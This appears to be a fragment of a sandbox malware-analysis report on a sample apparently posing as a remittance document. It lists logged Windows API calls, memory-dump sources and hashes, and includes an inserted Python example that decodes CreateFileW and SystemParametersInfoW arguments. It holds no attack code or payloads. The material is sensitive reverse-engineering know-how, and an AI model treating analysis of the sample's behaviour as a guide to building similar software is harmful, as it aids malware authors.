                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentTerminate
                                                                      • String ID:
                                                                      • API String ID: 2429186680-0
                                                                      • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                      • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                      • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                      • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                      APIs
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                      • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                      • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                      • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 0043214B
                                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                      • _malloc.LIBCMT ref: 0043215D
                                                                      • _malloc.LIBCMT ref: 0043216F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _malloc$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 680241177-0
                                                                      • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                      • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                      • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                      • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                      APIs
                                                                      • TranslateMessage.USER32(?), ref: 00409556
                                                                      • DispatchMessageW.USER32(?), ref: 00409561
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Message$DispatchPeekTranslate
                                                                      • String ID:
                                                                      • API String ID: 4217535847-0
                                                                      • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                      • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                      • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                      • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: f800691a6c58702cf5a996edc2c5780f63a8d9386b34bd2a46259168d6db88b9
                                                                      • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                      • Opcode Fuzzy Hash: f800691a6c58702cf5a996edc2c5780f63a8d9386b34bd2a46259168d6db88b9
                                                                      • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                      APIs
                                                                      • __wsplitpath.LIBCMT ref: 004678F7
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__wsplitpath_malloc
                                                                      • String ID:
                                                                      • API String ID: 4163294574-0
                                                                      • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                      • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                      • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                      • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 3d6c7d7a6ae677920793bf96237225282887b2b30ba90914ff16095f93448b68
                                                                      • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                                      • Opcode Fuzzy Hash: 3d6c7d7a6ae677920793bf96237225282887b2b30ba90914ff16095f93448b68
                                                                      • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                                      APIs
                                                                        • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                      • _strcat.LIBCMT ref: 0040F786
                                                                        • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                        • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                      • String ID:
                                                                      • API String ID: 3199840319-0
                                                                      • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                      • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                      • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                      • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                      • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: FreeInfoLibraryParametersSystem
                                                                      • String ID:
                                                                      • API String ID: 3403648963-0
                                                                      • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                      • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                      • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                      • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                      • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                      • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                      • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
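The SystemParametersInfoW and CreateFileW records above log their arguments as raw zero-padded hex (00002001, 80000000, 00000007, 00000003 ...), which is how the sandbox saw them on the stack. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses bullets in the report's "Api.MODULE(args), ref: addr" form and names the Win32 constants for those two calls. The constant values are the ones from the Windows SDK headers; the three sample lines are copied from the records above. Arguments beyond an API's declared parameter count are the sandbox's dump of the caller's stack (return addresses such as 0040DE74) and are intentionally left undecoded.

```python
"""Decode raw argument tuples in Joe Sandbox "APIs" bullets (added example)."""
import re
from typing import Callable, Dict, List, Optional, Tuple

# Assumed line shape, as seen in the report: "• Api.MODULE(a,b,...), ref: ADDR".
API_LINE = re.compile(
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 constants from winnt.h / winbase.h / winuser.h (insertion order = print order).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x40000000: "FILE_FLAG_OVERLAPPED"}
SPI_ACTION = {0x2000: "SPI_GETFOREGROUNDLOCKTIMEOUT", 0x2001: "SPI_SETFOREGROUNDLOCKTIMEOUT"}
SPIF_FLAGS = {0x1: "SPIF_UPDATEINIFILE", 0x2: "SPIF_SENDCHANGE"}


def flags_to_names(value: int, table: Dict[int, str]) -> str:
    """Expand a bitmask to 'A|B'; bits not in the table are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    known = sum(bit for bit in table if value & bit)
    rest = value & ~known
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"


def enum_to_name(value: int, table: Dict[int, str]) -> str:
    return table.get(value, hex(value))


def parse_api_line(line: str) -> Optional[dict]:
    """Return name/module/ref/args for an API bullet, or None for any other line.

    '?' means the sandbox could not resolve the value; it becomes None.
    LIBCMT entries without an argument list (e.g. '_malloc.LIBCMT ref: ...') are skipped.
    """
    m = API_LINE.search(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    for raw in m.group("args").split(","):
        raw = raw.strip()
        args.append(None if raw in ("", "?") else int(raw, 16))
    return {"name": m.group("name"), "module": m.group("module"),
            "ref": int(m.group("ref"), 16), "args": args}


# Positional parameter names and decoders for the APIs of interest.
Decoder = Optional[Callable[[int], str]]
DECODERS: Dict[str, List[Tuple[str, Decoder]]] = {
    "CreateFileW": [
        ("lpFileName", None),
        ("dwDesiredAccess", lambda v: flags_to_names(v, GENERIC_ACCESS)),
        ("dwShareMode", lambda v: flags_to_names(v, FILE_SHARE)),
        ("lpSecurityAttributes", None),
        ("dwCreationDisposition", lambda v: enum_to_name(v, CREATION_DISPOSITION)),
        ("dwFlagsAndAttributes", lambda v: flags_to_names(v, FILE_FLAGS)),
        ("hTemplateFile", None),
    ],
    "SystemParametersInfoW": [
        ("uiAction", lambda v: enum_to_name(v, SPI_ACTION)),
        ("uiParam", None),
        ("pvParam", None),
        ("fWinIni", lambda v: flags_to_names(v, SPIF_FLAGS)),
    ],
}


def decode_api_line(line: str) -> Optional[dict]:
    """Parse one bullet and, for known APIs, name its declared parameters only.

    zip() stops at the declared parameter count, so the trailing stack words
    the sandbox appends (return addresses etc.) are left out of 'decoded'.
    """
    parsed = parse_api_line(line)
    if parsed is None:
        return None
    decoded: Dict[str, str] = {}
    for (pname, fn), value in zip(DECODERS.get(parsed["name"], []), parsed["args"]):
        decoded[pname] = "?" if value is None else (fn(value) if fn else hex(value))
    parsed["decoded"] = decoded
    return parsed


# The three API bullets as they appear in the report records above.
REPORT_LINES = [
    "• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779",
    "• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A",
    "• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326",
]

if __name__ == "__main__":
    for rec in filter(None, map(decode_api_line, REPORT_LINES)):
        print(f"{rec['name']}.{rec['module']} @ {rec['ref']:08X}")
        for k, v in rec["decoded"].items():
            print(f"    {k:<22} {v}")
```

Read this way, the first CreateFileW opens an existing file read-only with every share flag set, the second opens or creates it for read and write, and the SystemParametersInfoW call is SPI_SETFOREGROUNDLOCKTIMEOUT with pvParam = 0 and SPIF_SENDCHANGE, which sets the foreground lock timeout to zero so the process can bring its own windows to the foreground. Extending DECODERS with further APIs from the report (Shell_NotifyIconW, PeekMessageW) follows the same pattern.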
                                                                      APIs
                                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                      • __lock_file.LIBCMT ref: 00414A8D
                                                                        • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                      • __fclose_nolock.LIBCMT ref: 00414A98
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2800547568-0
                                                                      • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                      • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                      • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                      • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
APIs
• __lock_file.LIBCMT ref: 00415012
• __ftell_nolock.LIBCMT ref: 0041501F
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: __ftell_nolock__getptd_noexit__lock_file
• String ID:
• API String ID: 2999321469-0
• Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
• Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
• Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
• Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
APIs
  • Part of subcall function 03EC2D50: GetFileAttributesW.KERNELBASE(?), ref: 03EC2D5B
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 03EC360F
Memory Dump Source
• Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: AttributesCreateDirectoryFile
• String ID:
• API String ID: 3401506121-0
• Opcode ID: 03fc0fe4d1d363b5bcaae60523602935eda57b3942cc4ea03ef92dbbedc34ea2
• Instruction ID: 11b8e58d9e29c13bdd73a003fd16119ad75d2b6593e2f202b58a6a0238fe364e
• Opcode Fuzzy Hash: 03fc0fe4d1d363b5bcaae60523602935eda57b3942cc4ea03ef92dbbedc34ea2
• Instruction Fuzzy Hash: 4C51C835A2024D97DF14EFB0C954BEF7339EF58300F0095A9A609E7280EB79AB45CB65
APIs
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
• Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
• Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
